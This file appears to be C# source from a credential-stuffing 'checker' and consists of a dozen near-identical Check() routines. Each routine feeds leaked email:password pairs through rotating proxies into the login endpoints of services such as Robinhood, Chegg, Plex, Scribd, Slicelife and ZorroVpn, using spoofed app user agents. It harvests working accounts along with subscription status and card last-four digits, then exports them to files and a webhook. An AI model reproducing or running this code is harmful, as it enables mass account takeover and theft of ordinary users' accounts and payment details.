public static void Check() { for (;;) { if (Program.Proxyindex > Program.Proxies.Count() - 2) { Program.Proxyindex = 0; } try { Interlocked.Increment(ref Program.Proxyindex); using (var req = new HttpRequest()) { if (Combosindex >= Combos.Count()) { Program.Stop++; break; } Interlocked.Increment(ref Combosindex); var array = Combos[Combosindex].Split(':', ';', '|'); var text = array[0] + ":" + array[1]; try { switch (Program.ProxyType1) { case "HTTP": req.Proxy = HttpProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; case "SOCKS4": req.Proxy = Socks4ProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; case "SOCKS5": req.Proxy = Socks5ProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; } req.UserAgent = "later-android%2F5.15.7.2+%281905150702%29+%28Android+OS+22%29"; req.IgnoreProtocolErrors = true; req.AllowAutoRedirect = false; req.SslCertificateValidatorCallback = (RemoteCertificateValidationCallback)Delegate.Combine( req.SslCertificateValidatorCallback, new RemoteCertificateValidationCallback((obj, cert, ssl, error) => (cert as X509Certificate2).Verify())); req.AddHeader("Accept", "application/json, text/plain, */*"); var post = "{\"device\":{\"build_number\":1905150702,\"name\":\"Samsung SM-G950U1\",\"os\":\"Android SDK 22\",\"time_zone\":\"Mountain Standard Time -07:00\",\"udid\":\"d6e3d010dcdd1af1\",\"version\":\"\"},\"auth\":{\"email\":\"" + array[0] + "\",\"password\":\"" + array[1] + "\"}}"; var text2 = req.Post("", post, "application/json;charset=UTF-8").ToString(); var flag7 = text2.Contains("{\"auth_token"); if (flag7) { Program.Hits++; Program.TotalChecks++; Export.AsResult("/Later.com_hits", array[0] + ":" + array[1]); if (Program.lorc == "LOG") { Settings.PrintHit("", array[0] + ":" + array[1]); } if (Settings.sendToWebhook) { Settings.sendTowebhook1(array[0] + ":" + array[1], " Hits"); } } else { Program.Fails++; Program.TotalChecks++; } } catch (Exception) { Program.Combos.Add(text); req.Dispose(); } } } catch { Interlocked.Increment(ref Program.Errors); } } }
public static void Check() { for (;;) { if (Program.Proxyindex > Program.Proxies.Count() - 2) { Program.Proxyindex = 0; } try { Interlocked.Increment(ref Program.Proxyindex); using (var req = new HttpRequest()) { if (Combosindex >= Combos.Count()) { Program.Stop++; break; } Interlocked.Increment(ref Combosindex); var array = Combos[Combosindex].Split(':', ';', '|'); var text = array[0] + ":" + array[1]; try { switch (Program.ProxyType1) { case "HTTP": req.Proxy = HttpProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; case "SOCKS4": req.Proxy = Socks4ProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; case "SOCKS5": req.Proxy = Socks5ProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; } req.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"; req.IgnoreProtocolErrors = true; req.AllowAutoRedirect = true; req.AddHeader("origin", ""); req.AddHeader("referer", ""); req.AddHeader("x-robinhood-api-version", "1.411.9"); var str = "{\"grant_type\":\"password\",\"scope\":\"internal\",\"client_id\":\"c82SH0WZOsabOXGP2sxqcj34FxkvfnWRZBKlBjFS\",\"expires_in\":86400,\"device_token\":\"" + "b50a336c-7538-4ee6-9e20-6ba9d46123de" + "\",\"username\":\"" + array[0] + "\",\"password\":\"" + array[1] + "\"}"; req.SslCertificateValidatorCallback = (RemoteCertificateValidationCallback)Delegate.Combine( req.SslCertificateValidatorCallback, new RemoteCertificateValidationCallback((obj, cert, ssl, error) => (cert as X509Certificate2).Verify())); var strResponse = req.Post("", str, "application/json").ToString(); { if (strResponse.Contains("Unable to log in with provided credentials")) { Program.TotalChecks++; Program.Fails++; } else if (strResponse.Contains("200")) { Program.TotalChecks++; Program.Fails++; } else if (strResponse.Contains("access_token")) { var access_token = Parse(strResponse, "token\": \"", "\""); req.AddHeader("authorization", "Bearer " + access_token); var text3 = req.Get("").ToString(); var text4 = Parse(text3, "locality\":\"", "\""); var text5 = Parse(text3, "email_verified\":", ",\""); Program.Hits++; Program.TotalChecks++; Export.AsResult("/Robinhood_hits", array[0] + ":" + array[1] + " | Location: " + text4 + " | Email Verified: " + text5); if (Program.lorc == "LOG") { Settings.PrintHit("Robinhood", array[0] + ":" + array[1] + " | Location: " + text4 + " | Email Verified: " + text5); } if (Settings.sendToWebhook) { Settings.sendTowebhook1( array[0] + ":" + array[1] + " | Location: " + text4 + " | Email Verified: " + text5, "Robinhood Hits"); } } } } catch (Exception) { Program.Combos.Add(text); } } } catch { Interlocked.Increment(ref Program.Errors); } } }
public static void Check() { for (;;) { if (Program.Proxyindex > Program.Proxies.Count() - 2) { Program.Proxyindex = 0; } try { Interlocked.Increment(ref Program.Proxyindex); using (var req = new HttpRequest()) { if (Combosindex >= Combos.Count()) { Program.Stop++; break; } Interlocked.Increment(ref Combosindex); var array = Combos[Combosindex].Split(':', ';', '|'); var text = array[0] + ":" + array[1]; try { switch (Program.ProxyType1) { case "HTTP": req.Proxy = HttpProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; case "SOCKS4": req.Proxy = Socks4ProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; case "SOCKS5": req.Proxy = Socks5ProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; } req.SslCertificateValidatorCallback = (RemoteCertificateValidationCallback)Delegate.Combine( req.SslCertificateValidatorCallback, new RemoteCertificateValidationCallback((obj, cert, ssl, error) => (cert as X509Certificate2).Verify())); var cookieStorage2 = req.Cookies = new CookieStorage(); req.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36"; req.AddHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8"); req.Referer = ""; var res = req.Post(new Uri(""), new BytesContent(Encoding.Default.GetBytes( "clientId=CHGG&redirect_uri=&state=&responseType=&email=" + array[0] + "&password="******"&version=2.121.22&profileId=CHGG"))); var text2 = res.ToString(); if (!text2.Contains("uuid\"")) { Program.Fails++; Program.TotalChecks++; } Program.Hits++; Program.TotalChecks++; if (Program.lorc == "LOG") { Settings.PrintHit("Chegg", array[0] + ":" + array[1]); } Export.AsResult("/Chegg_hits", array[0] + ":" + array[1]); if (Settings.sendToWebhook) { Settings.sendTowebhook1(array[0] + ":" + array[1], "Chegg Hits"); } } catch (Exception) { Program.Combos.Add(text); req.Dispose(); } } } catch { Interlocked.Increment(ref Program.Errors); } } }
public static void Check() { for (;;) { if (Program.Proxyindex > Program.Proxies.Count() - 2) { Program.Proxyindex = 0; } try { Interlocked.Increment(ref Program.Proxyindex); using (var req = new HttpRequest()) { if (Combosindex >= Combos.Count()) { Program.Stop++; break; } Interlocked.Increment(ref Combosindex); var array = Combos[Combosindex].Split(':', ';', '|'); var text = array[0] + ":" + array[1]; try { switch (Program.ProxyType1) { case "HTTP": req.Proxy = HttpProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; case "SOCKS4": req.Proxy = Socks4ProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; case "SOCKS5": req.Proxy = Socks5ProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; } req.IgnoreProtocolErrors = true; req.UserAgent = "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"; var httpResponse = req.Get(""); var value = httpResponse["X-Request-Id"]; req.AddHeader("X-Plex-Client-Identifier", value); var res = req.Post("", string.Concat("email=" + array[0] + "&login="******"&password="******"&includeProviders=true"), "application/x-www-form-urlencoded") .ToString(); switch (res) { case string a when res.Contains("User could not be authenticated") || res.Contains( "User could not be authenticated. This IP appears to be having trouble signing in to an account (detected repeated failures)\"") || res.Contains("X-Plex-Client-Identifier is missing"): break; case string b when res.Contains("username=\"") || res.Contains("subscriptionDescription=\""): var text3 = Parse(res, "subscriptionDescription=\"", "\""); var text4 = Parse(res, "subscribedAt=\"", "\""); var text5 = Parse(res, "status=\"", "\""); if (text5.Contains("Active") || !text5.Contains("Inactive")) { Program.Hits++; Program.TotalChecks++; Export.AsResult("/Plextv_hits", array[0] + ":" + array[1] + " | SubscribedSince: " + text4); if (Program.lorc == "LOG") { Settings.PrintHit("Plextv", array[0] + ":" + array[1] + " | SubscribedSince: " + text4); } if (Settings.sendToWebhook) { Settings.sendTowebhook1( array[0] + ":" + array[1] + " | SubscribedSince: " + text4, "Plex TV Hits"); } } else if (!text5.Contains("Active") || text5.Contains("Inactive")) { Program.Frees++; Program.TotalChecks++; Export.AsResult("/Plextv_frees", array[0] + ":" + array[1]); if (Program.lorc == "LOG") { Settings.PrintFree("Plextv", array[0] + ":" + array[1]); } } break; default: Program.Errors++; break; } } catch (Exception) { Program.Combos.Add(text); } } } catch { Interlocked.Increment(ref Program.Errors); } } }
public static void Check() { for (;;) { if (Program.Proxyindex > Program.Proxies.Count() - 2) { Program.Proxyindex = 0; } try { Interlocked.Increment(ref Program.Proxyindex); using (var req = new HttpRequest()) { if (Combosindex >= Combos.Count()) { Program.Stop++; break; } Interlocked.Increment(ref Combosindex); var array = Combos[Combosindex].Split(':', ';', '|'); var text = array[0] + ":" + array[1]; try { switch (Program.ProxyType1) { case "HTTP": req.Proxy = HttpProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; case "SOCKS4": req.Proxy = Socks4ProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; case "SOCKS5": req.Proxy = Socks5ProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; } req.UserAgent = "Albertsons/4554 CFNetwork/1121.2.2 Darwin/19.3.0"; req.IgnoreProtocolErrors = true; req.AllowAutoRedirect = false; req.SslCertificateValidatorCallback = (RemoteCertificateValidationCallback)Delegate.Combine( req.SslCertificateValidatorCallback, new RemoteCertificateValidationCallback((obj, cert, ssl, error) => (cert as X509Certificate2).Verify())); var text2 = req.Post("", string.Concat("{\"username\":\"", array[0], "\",\"password\":\"", array[1], "\"}"), "application/json").ToString(); var flag7 = text2.Contains("status\":\"SUCCESS"); if (flag7) { Program.Hits++; Program.TotalChecks++; Export.AsResult("/Albertsons_hits", array[0] + ":" + array[1]); if (Program.lorc == "LOG") { Settings.PrintHit("Albertsons", array[0] + ":" + array[1]); } if (Settings.sendToWebhook) { Settings.sendTowebhook1(array[0] + ":" + array[1], "Albertsons Hits"); } } else { Program.Fails++; Program.TotalChecks++; } } catch (Exception) { Program.Combos.Add(text); req.Dispose(); } } } catch { Interlocked.Increment(ref Program.Errors); } } }
public static void Check() { for (;;) { if (Program.Proxyindex > Program.Proxies.Count() - 2) { Program.Proxyindex = 0; } try { Interlocked.Increment(ref Program.Proxyindex); using (var req = new HttpRequest()) { if (Combosindex >= Combos.Count()) { Program.Stop++; break; } Interlocked.Increment(ref Combosindex); var array = Combos[Combosindex].Split(':', ';', '|'); var text = array[0] + ":" + array[1]; try { switch (Program.ProxyType1) { case "HTTP": req.Proxy = HttpProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; case "SOCKS4": req.Proxy = Socks4ProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; case "SOCKS5": req.Proxy = Socks5ProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; } req.IgnoreProtocolErrors = true; req.AllowAutoRedirect = true; req.AddHeader("user-agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36rv:11.0) like Gecko"); req.AddHeader("Pragma", "no-cache"); req.AddHeader("Accept", "*/*"); req.AddHeader("origin", ""); req.AddHeader("referer", ""); req.AddHeader("sec-fetch-dest", "empty"); req.AddHeader("sec-fetch-mode", "cors"); req.AddHeader("sec-fetch-site", "same-origin"); req.SslCertificateValidatorCallback = (RemoteCertificateValidationCallback)Delegate.Combine( req.SslCertificateValidatorCallback, new RemoteCertificateValidationCallback((obj, cert, ssl, error) => (cert as X509Certificate2).Verify())); var getscrf = req.Get("").ToString(); var csrf = Parse(getscrf, "name=\"csrf-token\" content=\"", "\" />"); //-------------------------------------- req.ClearAllHeaders(); req.AddHeader("user-agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36rv:11.0) like Gecko"); req.AddHeader("Pragma", "no-cache"); req.AddHeader("Accept", "*/*"); req.AddHeader("origin", ""); req.AddHeader("referer", ""); req.AddHeader("sec-fetch-dest", "empty"); req.AddHeader("sec-fetch-mode", "cors"); req.AddHeader("sec-fetch-site", "same-origin"); req.AddHeader("x-csrf-token", csrf); req.AddHeader("x-requested-with", "XMLHttpRequest"); var str = "{\"login_or_email\":\"" + array[0] + "\",\"login_password\":\"" + array[1] + "\",\"rememberme\":\"\",\"signup_location\":\"\",\"login_params\":{}}"; var strResponse = req.Post("", str, "application/json") .ToString(); { if (strResponse.Contains( "No account found with that email or username. Please try again or sign up.\"}]}") || strResponse.Contains("Invalid password. Please try again")) { Program.Fails++; Program.TotalChecks++; } else if (strResponse.Contains("success\":true")) //hit { req.ClearAllHeaders(); req.AddHeader("user-agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"); req.AddHeader("Pragma", "no-cache"); req.AddHeader("accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9"); var cap = req.Get("").ToString(); if (cap.Contains("next_payment_date\":\"")) { var validtill = Parse(cap, "next_payment_date\":\"", "\",\""); Program.Hits++; Program.TotalChecks++; Export.AsResult("/Scribd_hits", array[0] + ":" + array[1] + " | Valid till: " + validtill); if (Program.lorc == "LOG") { Settings.PrintHit("Scribd", array[0] + ":" + array[1]); } if (Settings.sendToWebhook) { Settings.sendTowebhook1( array[0] + ":" + array[1] + " | Valid till: " + validtill, "Scribd Hits"); } } else { Program.Frees++; Program.TotalChecks++; Export.AsResult("/Scribd_frees", array[0] + ":" + array[1]); if (Program.lorc == "LOG") { Settings.PrintFree("Scribd", array[0] + ":" + array[1]); } } } } } catch (Exception) { Program.Combos.Add(text); } } } catch { Interlocked.Increment(ref Program.Errors); } } }
public static void Check() { for (;;) { if (Program.Proxyindex > Program.Proxies.Count() - 2) { Program.Proxyindex = 0; } try { Interlocked.Increment(ref Program.Proxyindex); using (var req = new HttpRequest()) { if (Combosindex >= Combos.Count()) { Program.Stop++; break; } Interlocked.Increment(ref Combosindex); var array = Combos[Combosindex].Split(':', ';', '|'); var text = array[0] + ":" + array[1]; try { switch (Program.ProxyType1) { case "HTTP": req.Proxy = HttpProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; case "SOCKS4": req.Proxy = Socks4ProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; case "SOCKS5": req.Proxy = Socks5ProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; } req.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0"; req.IgnoreProtocolErrors = true; req.AllowAutoRedirect = false; req.SslCertificateValidatorCallback = (RemoteCertificateValidationCallback)Delegate.Combine( req.SslCertificateValidatorCallback, new RemoteCertificateValidationCallback((obj, cert, ssl, error) => (cert as X509Certificate2).Verify())); var text2 = req .Post("", string.Concat("{\"email\":\"", array[0], "\",\"clearTextPassword\":\"", array[1], "\"}"), "application/json").ToString(); var flag7 = text2.Contains("code\": \"SUCCESS"); var flag8 = text2.Contains("Email/password incorrect"); if (flag7) { Program.Hits++; Program.TotalChecks++; Export.AsResult("/Getupside_hits", array[0] + ":" + array[1]); if (Program.lorc == "LOG") { Settings.PrintHit("Getupside", array[0] + ":" + array[1]); } if (Settings.sendToWebhook) { Settings.sendTowebhook1(array[0] + ":" + array[1], "Getupside Hits"); } } else if (flag8) { Program.Fails++; Program.TotalChecks++; } } catch (Exception) { Program.Combos.Add(text); req.Dispose(); } } } catch { Interlocked.Increment(ref Program.Errors); } } }
public static void Check() { for (;;) { if (Program.Proxyindex > Program.Proxies.Count() - 2) { Program.Proxyindex = 0; } try { Interlocked.Increment(ref Program.Proxyindex); using (var req = new HttpRequest()) { if (Combosindex >= Combos.Count()) { Program.Stop++; break; } Interlocked.Increment(ref Combosindex); var array = Combos[Combosindex].Split(':', ';', '|'); var text = array[0] + ":" + array[1]; try { switch (Program.ProxyType1) { case "HTTP": req.Proxy = HttpProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; case "SOCKS4": req.Proxy = Socks4ProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; case "SOCKS5": req.Proxy = Socks5ProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; } req.UserAgent = "Shopify Mobile/Android/8.26.0 (Build 32571 with API 22 on Samsung SM-N950N)"; req.IgnoreProtocolErrors = true; req.AllowAutoRedirect = false; req.SslCertificateValidatorCallback = (RemoteCertificateValidationCallback)Delegate.Combine( req.SslCertificateValidatorCallback, new RemoteCertificateValidationCallback((obj, cert, ssl, error) => (cert as X509Certificate2).Verify())); req.AddHeader("Accept", "application/json, text/plain, */*"); var post = "{\"username\":\"" + array[0] + "\",\"password\":\"" + array[1] + "\",\"type\":\"sp\"}"; var text2 = req.Post("", post, "application/json;charset=UTF-8").ToString(); var flag7 = text2.Contains("\"has_subscription\":true"); var flag8 = text2.Contains("\"has_subscription\":false"); if (flag8) { if (flag7) { Program.Hits++; Program.TotalChecks++; Export.AsResult("/Smartproxy_hits", array[0] + ":" + array[1]); if (Program.lorc == "LOG") { Settings.PrintHit("Smartproxy", array[0] + ":" + array[1]); } if (Settings.sendToWebhook) { Settings.sendTowebhook1(array[0] + ":" + array[1], "Smartproxy Hits"); } } else if (flag8) { Program.Frees++; Program.TotalChecks++; Export.AsResult("/Smartproxy_frees", array[0] + ":" + array[1]); if (Program.lorc == "LOG") { Settings.PrintFree("Smartproxy", array[0] + ":" + array[1]); } } else { Program.Fails++; Program.TotalChecks++; } } } catch (Exception) { Program.Combos.Add(text); req.Dispose(); } } } catch { Interlocked.Increment(ref Program.Errors); } } }
public static void Check() { for (;;) { if (Program.Proxyindex > Program.Proxies.Count() - 2) { Program.Proxyindex = 0; } try { Interlocked.Increment(ref Program.Proxyindex); using (var req = new HttpRequest()) { if (Combosindex >= Combos.Count()) { Program.Stop++; break; } Interlocked.Increment(ref Combosindex); var array = Combos[Combosindex].Split(':', ';', '|'); var text = array[0] + ":" + array[1]; try { switch (Program.ProxyType1) { case "HTTP": req.Proxy = HttpProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; case "SOCKS4": req.Proxy = Socks4ProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; case "SOCKS5": req.Proxy = Socks5ProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; } req.UserAgent = "Mobile Buy SDK Android/3.2.3/com.aeron.shopifycore.gfuel"; req.KeepAliveTimeout = 5000; req.ReadWriteTimeout = 5000; req.ConnectTimeout = 5000; req.IgnoreProtocolErrors = true; req.AllowAutoRedirect = true; req.UseCookies = true; req.KeepAlive = true; req.AddHeader("Accept", "application/json"); req.AddHeader("X-BUY3-SDK-CACHE-FETCH-STRATEGY", "NETWORK_ONLY"); req.AddHeader("X-BUY3-SDK-EXPIRE-TIMEOUT", "0"); req.AddHeader("User-Agent", "Mobile Buy SDK Android/3.2.3/com.aeron.shopifycore.gfuel"); req.AddHeader("X-SDK-Version", "3.2.3"); req.AddHeader("X-SDK-Variant", "android"); req.AddHeader("X-Shopify-Storefront-Access-Token", "21765aa7568fd627c44d68bde191f6c0"); req.SslCertificateValidatorCallback += (obj, cert, ssl, error) => (cert as X509Certificate2).Verify(); if (req.Post("", "mutation{customerAccessTokenCreate(input:{email:\"" + array[0] + "\",password:\"" + array[1] + "\"}){customerAccessToken{accessToken,expiresAt},userErrors{field,message}}}", "application/graphql; charset=utf-8").ToString().Contains("accessToken")) { Program.Hits++; Program.TotalChecks++; Export.AsResult("/Gfuel_hits", array[0] + ":" + array[1]); if (Program.lorc == "LOG") { Settings.PrintHit("Gfuel", array[0] + ":" + array[1]); } if (Settings.sendToWebhook) { Settings.sendTowebhook1(array[0] + ":" + array[1], "Gfuel Hits"); } } else { Program.Fails++; Program.TotalChecks++; } } catch (Exception) { Program.Combos.Add(text); } } } catch { Interlocked.Increment(ref Program.Errors); } } }
public static void Check() { for (;;) { if (Program.Proxyindex > Program.Proxies.Count() - 2) { Program.Proxyindex = 0; } try { Interlocked.Increment(ref Program.Proxyindex); using (var req = new HttpRequest()) { if (Combosindex >= Combos.Count()) { Program.Stop++; break; } Interlocked.Increment(ref Combosindex); var array = Combos[Combosindex].Split(':', ';', '|'); var text = array[0] + ":" + array[1]; try { switch (Program.ProxyType1) { case "HTTP": req.Proxy = HttpProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; case "SOCKS4": req.Proxy = Socks4ProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; case "SOCKS5": req.Proxy = Socks5ProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; } req.AllowAutoRedirect = false; req.IgnoreProtocolErrors = true; req.UserAgent = "okhttp/3.13.1"; var str = "password="******"&grant_type=password&username="******"", str, "application/x-www-form-urlencoded").ToString(); var flag9 = text2.Contains("\"Unauthorized\""); if (flag9) { Program.Fails++; Program.TotalChecks++; } else if (text2.Contains("\"access_token\"")) { var access_token = Parse(text2, "access_token\":\"", "\",\""); req.AddHeader("Authorization", "Bearer " + access_token); var text3 = req .Get("") .ToString(); var text4 = Parse(text3, ",\"last_four\":\"", "\",\""); var text5 = Parse(text3, ",\"payment_type\":\"", "\",\""); Program.Hits++; Program.TotalChecks++; Export.AsResult("/Slicelife_hits", array[0] + ":" + array[1] + " | Last4Digits: " + text4 + " | PaymentType: " + text5); if (Program.lorc == "LOG") { Settings.PrintHit("Slicelife", array[0] + ":" + array[1] + " | Last4Digits: " + text4 + " | PaymentType: " + text5); } if (Settings.sendToWebhook) { Settings.sendTowebhook1( array[0] + ":" + array[1] + " | Last4Digits: " + text4 + " | PaymentType: " + text5, "Slicelife Hits"); } } } catch (Exception) { Program.Combos.Add(text); } } } catch { Interlocked.Increment(ref Program.Errors); } } }
public static void Check() { for (;;) { if (Program.Proxyindex > Program.Proxies.Count() - 2) { Program.Proxyindex = 0; } try { Interlocked.Increment(ref Program.Proxyindex); using (var req = new HttpRequest()) { if (Combosindex >= Combos.Count()) { Program.Stop++; break; } Interlocked.Increment(ref Combosindex); var array = Combos[Combosindex].Split(':', ';', '|'); var text = array[0] + ":" + array[1]; try { switch (Program.ProxyType1) { case "HTTP": req.Proxy = HttpProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; case "SOCKS4": req.Proxy = Socks4ProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; case "SOCKS5": req.Proxy = Socks5ProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; } req.SslCertificateValidatorCallback = (RemoteCertificateValidationCallback)Delegate.Combine( req.SslCertificateValidatorCallback, new RemoteCertificateValidationCallback((obj, cert, ssl, error) => (cert as X509Certificate2).Verify())); req.IgnoreProtocolErrors = true; req.KeepAlive = true; req.AllowAutoRedirect = true; req.AddHeader("Pragma", " no-cache"); req.AddHeader("Accept", " */*"); req.UserAgent = "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"; var res = req.Get("") .ToString(); var csrf = Parse(res, "input type=\"hidden\" name=\"mx_csrf_token\" value=\"", "\">"); req.AddHeader("Pragma", " no-cache"); req.AddHeader("Accept", " */*"); req.UserAgent = "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"; res = req.Post("", "module=quickregister&submode=login&b=1&fm_logintype=1&fm_email=" + array[0] + "&fm_pass="******"&mx_csrf_token=" + csrf, "application/x-www-form-urlencoded") .ToString(); if (res.Contains("Login incorrect") || res.Contains("login data was not accepted")) { break; } if (res.Contains("User data") || res.Contains("My products")) { req.AddHeader("Pragma", " no-cache"); req.AddHeader("Accept", " */*"); req.UserAgent = "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"; res = req.Get( "") .ToString(); if (res.Contains("User data") && res.Contains("You have registered the following MAGIX products.") == false) { Program.Frees++; Program.TotalChecks++; Export.AsResult("/Sonyvegas_frees", array[0] + ":" + array[1]); if (Program.lorc == "LOG") { Settings.PrintFree("Sonyvegas", array[0] + ":" + array[1]); } } else if (res.Contains( "><td colspan=2 class=\"tableColumnTypeHeadline\" valign=\"middle\" height=\"25\"><b>") ) { var prod = Parse(res, "><td colspan=2 class=\"tableColumnTypeHeadline\" valign=\"middle\" height=\"25\"><b>", "</b></td>"); Program.Hits++; Program.TotalChecks++; Export.AsResult("/Sonyvegas_hits", array[0] + ":" + array[1] + " | Products: " + prod); if (Program.lorc == "LOG") { Settings.PrintHit("Sonyvegas", array[0] + ":" + array[1] + " | Products: " + prod); } if (Settings.sendToWebhook) { Settings.sendTowebhook1(array[0] + ":" + array[1] + " | Products: " + prod, "Sonyvegas Hits"); } } } } catch (Exception) { Program.Combos.Add(text); } } } catch { Interlocked.Increment(ref Program.Errors); } } }
public static void Check() { for (;;) { if (Program.Proxyindex > Program.Proxies.Count() - 2) { Program.Proxyindex = 0; } try { Interlocked.Increment(ref Program.Proxyindex); using (var req = new HttpRequest()) { if (Combosindex >= Combos.Count()) { Program.Stop++; break; } Interlocked.Increment(ref Combosindex); var array = Combos[Combosindex].Split(':', ';', '|'); var text3 = array[0] + ":" + array[1]; try { switch (Program.ProxyType1) { case "HTTP": req.Proxy = HttpProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; case "SOCKS4": req.Proxy = Socks4ProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; case "SOCKS5": req.Proxy = Socks5ProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; } req.SslCertificateValidatorCallback = (RemoteCertificateValidationCallback)Delegate.Combine( req.SslCertificateValidatorCallback, new RemoteCertificateValidationCallback((obj, cert, ssl, error) => (cert as X509Certificate2).Verify())); var httpResponse = req.Post(new Uri(""), new BytesContent( Encoding.Default.GetBytes("email=" + array[0] + "&password="******"Wrong username/email or password") && text.Contains("Zorro")) { Program.Hits++; Program.TotalChecks++; Export.AsResult("/ZorroVpn_hits", array[0] + ":" + array[1]); if (Program.lorc == "LOG") { Settings.PrintHit("ZorroVpn", array[0] + ":" + array[1]); } if (Settings.sendToWebhook) { Settings.sendTowebhook1(array[0] + ":" + array[1], "ZorroVpn Hits"); } } if (text.Contains("Wrong username/email or password")) { Program.Fails++; Program.TotalChecks++; } } catch (Exception) { Program.Combos.Add(text3); } } } catch { Interlocked.Increment(ref Program.Errors); } } }